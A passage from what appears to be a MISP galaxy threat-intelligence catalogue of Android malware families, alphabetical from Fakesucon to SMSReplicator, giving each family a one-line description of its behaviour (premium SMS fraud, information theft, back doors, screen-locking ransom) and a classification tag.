The tag is: `misp-galaxy:android="Fakesucon"`

*Table 150. Table References*

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**Faketaobao**

Faketaobao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Faketaobao"`

*Table 151. Table References*

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<th>Links</th>
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</table>

**Faketaobao.B**

Faketaobao.B is a Trojan horse for Android devices that intercepts and sends incoming SMS messages to a remote attacker.

The tag is: `misp-galaxy:android="Faketaobao.B"`

*Table 152. Table References*

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**Faketoken**

Faketoken is a Trojan horse that opens a back door on the compromised device.

The tag is: `misp-galaxy:android="Faketoken"`

*Table 153. Table References*

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</table>
**Fakeupdate**

Fakeupdate is a Trojan horse for Android devices that downloads other applications onto the compromised device.

The tag is: `misp-galaxy:android="Fakeupdate"`

**Table 154. Table References**

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</table>

**Fakevoice**

Fakevoice is a Trojan horse for Android devices that dials a premium-rate phone number.

The tag is: `misp-galaxy:android="Fakevoice"`

**Table 155. Table References**

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**Farmbaby**

Farmbaby is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: `misp-galaxy:android="Farmbaby"`

**Table 156. Table References**

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<th>Links</th>
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</table>

**Fauxtocopy**

Fauxtocopy is a spyware application for Android devices that gathers photos from the device and sends them to a predetermined email address.

The tag is: `misp-galaxy:android="Fauxtocopy"`

**Table 157. Table References**

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<th>Links</th>
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</table>
**Feiwo**

Feiwo is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Feiwo"`

Table 158. Table References

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<th>Links</th>
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</table>

**FindAndCall**

FindAndCall is a Potentially Unwanted Application for Android devices that may leak information.

The tag is: `misp-galaxy:android="FindAndCall"`

Table 159. Table References

<table>
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<th>Links</th>
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</table>

**Finfish**

Finfish is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Finfish"`

Table 160. Table References

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<th>Links</th>
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</table>

**Fireleaker**

Fireleaker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fireleaker"`

Table 161. Table References

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<th>Links</th>
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</table>
**Fitikser**

Fitikser is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fitikser"`

*Table 162. Table References*

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<th>Links</th>
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</table>

**Flexispy**

Flexispy is a Spyware application for Android devices that logs the device's activity and sends it to a predetermined website.

The tag is: `misp-galaxy:android="Flexispy"`

*Table 163. Table References*

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<th>Links</th>
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</table>

**Fokonge**

Fokonge is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Fokonge"`

*Table 164. Table References*

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<th>Links</th>
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</table>

**FoncySMS**

FoncySMS is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers. It may also connect to an IRC server and execute any received shell commands.

The tag is: `misp-galaxy:android="FoncySMS"`

*Table 165. Table References*

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<th>Links</th>
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</table>
**Frogonal**

Frogonal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Frogonal"`

*Table 166. Table References*

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**Ftad**

Ftad is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Ftad"`

*Table 167. Table References*

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<th>Links</th>
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</table>

**Funtasy**

Funtasy is a Trojan horse for Android devices that subscribes the user to premium SMS services.

The tag is: `misp-galaxy:android="Funtasy"`

*Table 168. Table References*

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<th>Links</th>
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</table>

**GallMe**

GallMe is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="GallMe"`

*Table 169. Table References*

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</table>

**Gamex**

Gamex is a Trojan horse for Android devices that downloads further threats.
Gappusin

Gappusin is a Trojan horse for Android devices that downloads applications and disguises them as system updates.

The tag is: misp-galaxy:android="Gappusin"

Gazon

Gazon is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Gazon"

Geinimi

Geinimi is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Geinimi"

Generisk

Generisk is a generic detection for Android applications that may pose a privacy, security, or stability risk to the user or user's Android device.

The tag is: misp-galaxy:android="Generisk"
Genheur

Genheur is a generic detection for many individual but varied Trojans for Android devices for which specific definitions have not been created. A generic detection is used because it protects against many Trojans that share similar characteristics.

The tag is: \textit{misp-galaxy:android}="Genheur"

Genpush

Genpush is an advertisement library that is bundled with certain Android applications.

The tag is: \textit{misp-galaxy:android}="Genpush"

GeoFake

GeoFake is a Trojan horse for Android devices that sends SMS messages to premium-rate numbers.

The tag is: \textit{misp-galaxy:android}="GeoFake"

Geplook

Geplook is a Trojan horse for Android devices that downloads additional apps onto the compromised device.

The tag is: \textit{misp-galaxy:android}="Geplook"
Getadpush

Getadpush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Getadpush"`

Table 179. Table References

Ggtracker

Ggtracker is a Trojan horse for Android devices that sends SMS messages to a premium-rate number. It may also steal information from the device.

The tag is: `misp-galaxy:android="Ggtracker"`

Table 180. Table References

Ghostpush

Ghostpush is a Trojan horse for Android devices that roots the compromised device. It may then perform malicious activities on the compromised device.

The tag is: `misp-galaxy:android="Ghostpush"`

Table 181. Table References

Gmaster

Gmaster is a Trojan horse on the Android platform that steals potentially confidential information from the compromised device.

The tag is: `misp-galaxy:android="Gmaster"`

Table 182. Table References
Godwon

Godwon is a Trojan horse for Android devices that steals information.

The tag is: `misp-galaxy:android="Godwon"`

Table 183. Table References

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Golddream

Golddream is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Golddream"`

Table 184. Table References

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Goldeneagle

Goldeneagle is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Goldeneagle"`

Table 185. Table References

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Golocker

Golocker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Golocker"`

Table 186. Table References

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Gomal

Gomal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Gomal"

Table 187. Table References

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Gonesixty

Gonesixty is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonesixty"

Table 188. Table References

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Gonfu

Gonfu is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu"

Table 189. Table References

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</table>

Gonfu.B

Gonfu.B is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu.B"

Table 190. Table References

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</table>

Gonfu.C

Gonfu.C is a Trojan horse for Android devices that may download additional threats on the compromised device.
The tag is: `misp-galaxy:android="Gonfu.C"`

### Table 191. Table References

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**Gonfu.D**

Gonfu.D is a Trojan horse that opens a back door on Android devices.

The tag is: `misp-galaxy:android="Gonfu.D"`

### Table 192. Table References

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<th>Links</th>
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**Gooboot**

Gooboot is a Trojan horse for Android devices that may send text messages to premium rate numbers.

The tag is: `misp-galaxy:android="Gooboot"`

### Table 193. Table References

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<th>Links</th>
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**Goodadpush**

Goodadpush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Goodadpush"`

### Table 194. Table References

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<th>Links</th>
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</table>

**Greystripe**

Greystripe is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Greystripe"`

### Table 195. Table References
Gugespy

Gugespy is a spyware program for Android devices that logs the device's activity and sends it to a predetermined email address.

The tag is: `misp-galaxy:android"Gugespy"`

Table 196. Table References

Gugespy.B

Gugespy.B is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: `misp-galaxy:android"Gugespy.B"`

Table 197. Table References

Gupno

Gupno is a Trojan horse for Android devices that poses as a legitimate app and attempts to charge users for features that are normally free. It may also display advertisements on the compromised device.

The tag is: `misp-galaxy:android"Gupno"`

Table 198. Table References

Habey

Habey is a Trojan horse for Android devices that may attempt to delete files and send SMS messages from the compromised device.

The tag is: `misp-galaxy:android"Habey"`

Table 199. Table References
Handyclient

Handyclient is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Handyclient"`

Table 200. Table References

Hehe

Hehe is a Trojan horse for Android devices that blocks incoming calls and SMS messages from specific numbers. The Trojan also steals information from the compromised device.

The tag is: `misp-galaxy:android="Hehe"`

Table 201. Table References

Hesperbot

Hesperbot is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: `misp-galaxy:android="Hesperbot"`

Table 202. Table References

Hippo

Hippo is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: `misp-galaxy:android="Hippo"`

Table 203. Table References
**Hippo.B**

Hippo.B is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: `misp-galaxy:android="Hippo.B"`

*Table 204. Table References*

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<th>Links</th>
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**IadPush**

IadPush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="IadPush"`

*Table 205. Table References*

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</table>

**iBanking**

iBanking is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: `misp-galaxy:android="iBanking"`

*Table 206. Table References*

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<th>Links</th>
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</table>

**Iconosis**

Iconosis is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Iconosis"`

*Table 207. Table References*

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<th>Links</th>
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</table>
**Iconosys**

Iconosys is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: *misp-galaxy:android*="Iconosys"

**Table 208. Table References**

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<th>Links</th>
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</table>

**Igexin**

Igexin is an advertisement library that is bundled with certain Android applications. Igexin has the capability of spying on victims through otherwise benign apps by downloading malicious plugins.

The tag is: *misp-galaxy:android*="Igexin"

Igexin is also known as:

- IcicleGum

Igexin has relationships with:

- similar: *misp-galaxy:android*="IcicleGum" with estimative-language:likelihood-probability="likely"

**Table 209. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.lookout.com/igexin-malicious-sdk">https://blog.lookout.com/igexin-malicious-sdk</a></td>
</tr>
</tbody>
</table>

**ImAdPush**

ImAdPush is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="ImAdPush"

**Table 210. Table References**

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<th>Links</th>
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</table>
**InMobi**

InMobi is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="InMobi"`

**Table 211. Table References**

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<th>Links</th>
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</table>

**Jifake**

Jifake is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: `misp-galaxy:android="Jifake"`

**Table 212. Table References**

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</table>

**Jollyserv**

Jollyserv is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: `misp-galaxy:android="Jollyserv"`

**Table 213. Table References**

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<th>Links</th>
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</table>

**Jsmshider**

Jsmshider is a Trojan horse that opens a back door on Android devices.

The tag is: `misp-galaxy:android="Jsmshider"`

**Table 214. Table References**

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<th>Links</th>
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</table>
Ju6

Ju6 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ju6"

Table 215. Table References

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Jumptap

Jumptap is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jumptap"

Table 216. Table References

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</table>

Jzmob

Jzmob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jzmob"

Table 217. Table References

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</table>

Kabstamper

Kabstamper is a Trojan horse for Android devices that corrupts images found on the compromised device.

The tag is: misp-galaxy:android="Kabstamper"

Table 218. Table References

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</table>

Kidlogger

Kidlogger is a Spyware application for Android devices that logs the device’s activity and sends it to
a predetermined website.

The tag is: $\textit{misp-galaxy:android}=\textquote{Kidlogger}$

\textbf{Table 219. Table References}

| Links |  
|-------|---

\textbf{Kielog}

Kielog is a Trojan horse for Android devices that logs keystrokes and sends the stolen information to the remote attacker.

The tag is: $\textit{misp-galaxy:android}=\textquote{Kielog}$

\textbf{Table 220. Table References}

| Links |  
|-------|---

\textbf{Kituri}

Kituri is a Trojan horse for Android devices that blocks certain SMS messages from being received by the device. It may also send SMS messages to a premium-rate number.

The tag is: $\textit{misp-galaxy:android}=\textquote{Kituri}$

\textbf{Table 221. Table References}

| Links |  
|-------|---

\textbf{Kranxpay}

Kranxpay is a Trojan horse for Android devices that downloads other apps onto the device.

The tag is: $\textit{misp-galaxy:android}=\textquote{Kranxpay}$

\textbf{Table 222. Table References}

| Links |  
|-------|---

\textbf{Krysanec}

Krysanec is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: $\textit{misp-galaxy:android}=\textquote{Krysanec}$
Kuaidian360

Kuaidian360 is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Kuaidian360"`

Kuguo

Kuguo is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Kuguo"`

Lastacloud

Lastacloud is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Lastacloud"`

Laucassspy

Laucassspy is a spyware program for Android devices that steals information and sends it to a remote location.

The tag is: `misp-galaxy:android="Laucassspy"`
Lifemonspy

Lifemonspy is a spyware application for Android devices that can track the phone's location, download SMS messages, and erase certain data from the device.

The tag is: `misp-galaxy:android="Lifemonspy"`

Table 228. Table References

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</table>

Lightdd

Lightdd is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Lightdd"`

Table 229. Table References

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</table>

Loaderpush

Loaderpush is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Loaderpush"`

Table 230. Table References

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Locaspy

Locaspy is a Potentially Unwanted Application for Android devices that tracks the location of the compromised device.

The tag is: `misp-galaxy:android="Locaspy"`

Table 231. Table References

<table>
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</table>
**Lockdroid.E**

Lockdroid.E is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: `misp-galaxy:android="Lockdroid.E"`

Table 232. Table References

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**Lockdroid.F**

Lockdroid.F is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: `misp-galaxy:android="Lockdroid.F"`

Table 233. Table References

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</table>

**Lockdroid.G**

Lockdroid.G is a Trojan horse for Android devices that may display a ransom demand on the compromised device.

The tag is: `misp-galaxy:android="Lockdroid.G"`

Table 234. Table References

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</table>

**Lockdroid.H**

Lockdroid.H is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: `misp-galaxy:android="Lockdroid.H"`

Table 235. Table References

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</table>
**Lockscreen**

Lockscreen is a Trojan horse for Android devices that locks the compromised device from use.

The tag is: `misp-galaxy:android="Lockscreen"`

Table 236. Table References

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**LogiaAd**

LogiaAd is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="LogiaAd"`

Table 237. Table References

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**Loicdos**

Loicdos is an Android application that provides an interface to a website in order to perform a denial of service (DoS) attack against a computer.

The tag is: `misp-galaxy:android="Loicdos"`

Table 238. Table References

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**Loozfon**

Loozfon is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Loozfon"`

Table 239. Table References

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**Lotoor**

Lotoor is a generic detection for hack tools that exploit vulnerabilities in order to gain root privileges on compromised Android devices.

The tag is: `misp-galaxy:android="Lotoor"`

**Table 240. Table References**

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**Lovespy**

Lovespy is a Trojan horse for Android devices that steals information from the device.

The tag is: `misp-galaxy:android="Lovespy"`

**Table 241. Table References**

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**Lovetrap**

Lovetrap is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: `misp-galaxy:android="Lovetrap"`

**Table 242. Table References**

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**Luckycat**

Luckycat is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: `misp-galaxy:android="Luckycat"`

**Table 243. Table References**

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Machinleak

Machinleak is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Machinleak"

Table 244. Table References

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Maistealer

Maistealer is a Trojan that steals information from Android devices.

The tag is: misp-galaxy:android="Maistealer"

Table 245. Table References

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<th>Links</th>
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Malapp

Malapp is a generic detection for many individual but varied threats on Android devices that share similar characteristics.

The tag is: misp-galaxy:android="Malapp"

Table 246. Table References

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Malebook

Malebook is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malebook"

Table 247. Table References

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<th>Links</th>
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**Malhome**

Malhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: *misp-galaxy:android="Malhome"*

**Table 248. Table References**

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**Malminer**

Malminer is a Trojan horse for Android devices that mines cryptocurrencies on the compromised device.

The tag is: *misp-galaxy:android="Malminer"*

**Table 249. Table References**

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**Mania**

Mania is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: *misp-galaxy:android="Mania"*

**Table 250. Table References**

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</table>

**Maxit**

Maxit is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals certain information and uploads it to a remote location.

The tag is: *misp-galaxy:android="Maxit"*

**Table 251. Table References**

<table>
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**MdotM**

MdotM is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="MdotM"*

*Table 252. Table References*

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**Medialets**

Medialets is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="Medialets"*

*Table 253. Table References*

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**Meshidden**

Meshidden is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: *misp-galaxy:android="Meshidden"*

*Table 254. Table References*

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**Mesploit**

Mesploit is a tool for Android devices used to create applications that exploit the Android Fake ID vulnerability.

The tag is: *misp-galaxy:android="Mesploit"*

*Table 255. Table References*

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**Mesprank**

Mesprank is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: `misp-galaxy:android="Mesprank"`

Table 256. Table References

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**Meswatcherbox**

Meswatcherbox is a spyware application for Android devices that forwards SMS messages without the user knowing.

The tag is: `misp-galaxy:android="Meswatcherbox"`

Table 257. Table References

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**Miji**

Miji is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Miji"`

Table 258. Table References

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</table>

**Milipnot**

Milipnot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Milipnot"`

Table 259. Table References

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</table>
MillennialMedia

MillennialMedia is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="MillennialMedia"*

Table 260. Table References

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Mitcad

Mitcad is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="Mitcad"*

Table 261. Table References

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MobClix

MobClix is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="MobClix"*

Table 262. Table References

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MobFox

MobFox is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="MobFox"*

Table 263. Table References

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Mobidisplay

Mobidisplay is an advertisement library that is bundled with certain Android applications.
Mobigapp

Mobigapp is a Trojan horse for Android devices that downloads applications disguised as system updates.

MobileBackup

MobileBackup is a spyware application for Android devices that monitors the affected device.

Mobilespy

Mobilespy is a Trojan horse that steals information from Android devices.

Mobiletx

Mobiletx is a Trojan horse for Android devices that steals information from the compromised device. It may also send SMS messages to a premium-rate number.
Mobinaspy

Mobinaspy is a spyware application for Android devices that can track the device's location.

The tag is: `misp-galaxy:android="Mobinaspy"`

Table 269. Table References

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Mobus

Mobus is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Mobus"`

Table 270. Table References

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MobWin

MobWin is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="MobWin"`

Table 271. Table References

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Mocore

Mocore is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Mocore"`

Table 272. Table References

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**Moghava**
Moghava is a Trojan horse for Android devices that modifies images that are stored on the device.
The tag is: `misp-galaxy:android="Moghava"`

**Momark**
Momark is an advertisement library that is bundled with certain Android applications.
The tag is: `misp-galaxy:android="Momark"`

**Monitorello**
Monitorello is a spyware application for Android devices that allows the device it is installed on to be monitored.
The tag is: `misp-galaxy:android="Monitorello"`

**Moolah**
Moolah is an advertisement library that is bundled with certain Android applications.
The tag is: `misp-galaxy:android="Moolah"`

**MoPub**
MoPub is an advertisement library that is bundled with certain Android applications.
Morepaks

Morepaks is a Trojan horse for Android devices that downloads remote files and may display advertisements on the compromised device.

The tag is: misp-galaxy:android="Morepaks"

Nandrobox

Nandrobox is a Trojan horse for Android devices that steals information from the compromised device. It also deletes certain SMS messages from the device.

The tag is: misp-galaxy:android="Nandrobox"

Netisend

Netisend is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Netisend"

Nickispy

Nickispy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Nickispy"
**Notcompatible**

Notcompatible is a Trojan horse for Android devices that acts as a proxy.

The tag is: `misp-galaxy:android="Notcompatible"`

*Table 282. Table References*

**Nuhaz**

Nuhaz is a Trojan horse for Android devices that may intercept text messages on the compromised device.

The tag is: `misp-galaxy:android="Nuhaz"`

*Table 283. Table References*

**Nyearleaker**

Nyearleaker is a Trojan horse program for Android devices that steals information.

The tag is: `misp-galaxy:android="Nyearleaker"`

*Table 284. Table References*

**Obad**

Obad is a Trojan horse for Android devices that opens a back door, steals information, and downloads files. It also sends SMS messages to premium-rate numbers and spreads malware to Bluetooth-enabled devices.

The tag is: `misp-galaxy:android="Obad"`

*Table 285. Table References*
Oneclickfraud

Oneclickfraud is a Trojan horse for Android devices that attempts to coerce a user into paying for a pornographic service.

The tag is: `misp-galaxy:android="Oneclickfraud"`

Table 286. Table References

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Opfake

Opfake is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers.

The tag is: `misp-galaxy:android="Opfake"`

Table 287. Table References

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Opfake.B

Opfake.B is a Trojan horse for the Android platform that may receive commands from a remote attacker to perform various functions.

The tag is: `misp-galaxy:android="Opfake.B"`

Table 288. Table References

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Ozotshielder

Ozotshielder is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Ozotshielder"`

Table 289. Table References

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**Pafloat**

Pafloat is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Pafloat"`

*Table 290. Table References*

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**PandaAds**

PandaAds is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="PandaAds"`

*Table 291. Table References*

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**Pandbot**

Pandbot is a Trojan horse for Android devices that may download more files onto the device.

The tag is: `misp-galaxy:android="Pandbot"`

*Table 292. Table References*

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**Pdaspy**

Pdaspy is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: `misp-galaxy:android="Pdaspy"`

*Table 293. Table References*

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**Penetho**

Penetho is a hacktool for Android devices that can be used to crack the WiFi password of the router.
that the device is using.

The tag is: misp-galaxy:android="Penetho"

**Table 294. Table References**

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**Perkel**

Perkel is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Perkel"

**Table 295. Table References**

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**Phimdropper**

Phimdropper is a Trojan horse for Android devices that sends and intercepts incoming SMS messages.

The tag is: misp-galaxy:android="Phimdropper"

**Table 296. Table References**

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**Phospy**

Phospy is a Trojan horse for Android devices that steals confidential information from the compromised device.

The tag is: misp-galaxy:android="Phospy"

**Table 297. Table References**

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**Piddialer**

Piddialer is a Trojan horse for Android devices that dials premium-rate numbers from the
compromised device.

The tag is: misp-galaxy:android="Piddialer"

Table 298. Table References

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**Pikspam**

Pikspam is a Trojan horse for Android devices that sends spam SMS messages from the compromised device.

The tag is: misp-galaxy:android="Pikspam"

Table 299. Table References

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**Pincer**

Pincer is a Trojan horse for Android devices that steals confidential information and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pincer"

Table 300. Table References

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**Pirator**

Pirator is a Trojan horse on the Android platform that downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Pirator"

Table 301. Table References

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**Pjapps**

Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door
on the compromised device. It retrieves commands from a remote command and control server.

The tag is: *misp-galaxy:android="Pjapps"

Table 302. Table References

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**Pjapps.B**

Pjapps.B is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: *misp-galaxy:android="Pjapps.B"

Table 303. Table References

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**Pletora**

Pletora is a Trojan horse for Android devices that may lock the compromised device. It then asks the user to pay in order to unlock the device.

The tag is: *misp-galaxy:android="Pletora"

Table 304. Table References

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**Poisoncake**

Poisoncake is a Trojan horse for Android devices that opens a back door on the compromised device. It may also download potentially malicious files and steal information.

The tag is: *misp-galaxy:android="Poisoncake"

Table 305. Table References

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**Pontiflex**

Pontiflex is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="Pontiflex"
**Positmob**

Positmob is a Trojan horse program for Android devices that sends SMS messages to premium rate phone numbers.

The tag is: `misp-galaxy:android="Positmob"`

**Premiumtext**

Premiumtext is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers. These Trojans will often be repackaged versions of genuine Android software packages, often distributed outside the Android Marketplace.

The tag is: `misp-galaxy:android="Premiumtext"`

**Pris**

Pris is a Trojan horse for Android devices that silently downloads a malicious application and attempts to open a back door on the compromised device.

The tag is: `misp-galaxy:android="Pris"`

**Qdplugin**

Qdplugin is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Qdplugin"`
Qicsomos

Qicsomos is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: `misp-galaxy:android="Qicsomos"`

Qitmo

Qitmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Qitmo"`

Rabbhome

Rabbhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Rabbhome"`

Repane

Repane is a Trojan horse for Android devices that steals information and sends SMS messages from the compromised device.

The tag is: `misp-galaxy:android="Repane"`
Reputation.1

Reputation.1 is a detection for Android files based on analysis performed by Norton Mobile Insight. The tag is: *misp-galaxy:android="Reputation.1"*

Table 315. Table References

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Reputation.2

Reputation.2 is a detection for Android files based on analysis performed by Norton Mobile Insight. The tag is: *misp-galaxy:android="Reputation.2"*

Table 316. Table References

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Reputation.3

Reputation.3 is a detection for Android files based on analysis performed by Norton Mobile Insight. The tag is: *misp-galaxy:android="Reputation.3"*

Table 317. Table References

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RevMob

RevMob is an advertisement library that is bundled with certain Android applications. The tag is: *misp-galaxy:android="RevMob"*

Table 318. Table References

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Roidsec

Roidsec is a Trojan horse for Android devices that steals confidential information.

The tag is: `misp-galaxy:android="Roidsec"`

Table 319. Table References

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Rootcager

Rootcager is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Rootcager"`

Table 320. Table References

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Rootnik

Rootnik is a Trojan horse for Android devices that steals information and downloads additional apps.

The tag is: `misp-galaxy:android="Rootnik"`

Rootnik has relationships with:

- similar: `misp-galaxy:malpedia="Rootnik"` with `estimative-language:likelihood-probability="likely"`

Table 321. Table References

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Rufraud

Rufraud is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: `misp-galaxy:android="Rufraud"`

Table 322. Table References

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**Rusms**

Rusms is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: `misp-galaxy:android="Rusms"`

*Table 323. Table References*

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<th>Links</th>
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**Samsapo**

Samsapo is a worm for Android devices that spreads by sending SMS messages to all contacts stored on the compromised device. It also opens a back door and downloads files.

The tag is: `misp-galaxy:android="Samsapo"`

*Table 324. Table References*

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**Sandorat**

Sandorat is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals information.

The tag is: `misp-galaxy:android="Sandorat"`

*Table 325. Table References*

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</table>

**Sberick**

Sberick is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Sberick"`

*Table 326. Table References*

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</table>
Scartibro

Scartibro is a Trojan horse for Android devices that locks the compromised device and asks the user to pay in order to unlock it.

The tag is: misp-galaxy:android="Scartibro"

Table 327. Table References

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Scipiex

Scipiex is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Scipiex"

Table 328. Table References

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Selfmite

Selfmite is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite"

Table 329. Table References

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Selfmite.B

Selfmite.B is a worm for Android devices that displays ads on the compromised device. It spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite.B"

Table 330. Table References

<table>
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<th>Links</th>
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</table>
**SellARing**

SellARing is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="SellARing"`

**SendDroid**

SendDroid is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="SendDroid"`

**Simhosy**

Simhosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Simhosy"`

**Simplocker**

Simplocker is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: `misp-galaxy:android="Simplocker"`
**Simplocker.B**

Simplocker.B is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: `misp-galaxy:android="Simplocker.B"`

*Table 335. Table References*

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**Skullkey**

Skullkey is a Trojan horse for Android devices that gives the attacker remote control of the compromised device to perform malicious activity.

The tag is: `misp-galaxy:android="Skullkey"`

*Table 336. Table References*

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**Smaato**

Smaato is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Smaato"`

*Table 337. Table References*

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**Smbcheck**

Smbcheck is a hacktool for Android devices that can trigger a Server Message Block version 2 (SMBv2) vulnerability and may cause the target computer to crash.

The tag is: `misp-galaxy:android="Smbcheck"`

*Table 338. Table References*

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</table>
**Smsblocker**

Smsblocker is a generic detection for threats on Android devices that block the transmission of SMS messages.

The tag is: `misp-galaxy:android="Smsblocker"`

**Table 339. Table References**

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**Smsbomber**

Smsbomber is a program that can be used to send messages to contacts on the device.

The tag is: `misp-galaxy:android="Smsbomber"`

**Table 340. Table References**

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**Smslink**

Smslink is a Trojan horse for Android devices that may send malicious SMS messages from the compromised device. It may also display advertisements.

The tag is: `misp-galaxy:android="Smslink"`

**Table 341. Table References**

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**Smspacem**

Smspacem is a Trojan horse that may send SMS messages from Android devices.

The tag is: `misp-galaxy:android="Smspacem"`

**Table 342. Table References**

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SMSReplicator

SMSReplicator is a spying utility that will secretly transmit incoming SMS messages to another phone of the installer's choice.

The tag is: *misp-galaxy:android*="SMSReplicator"

Table 343. Table References

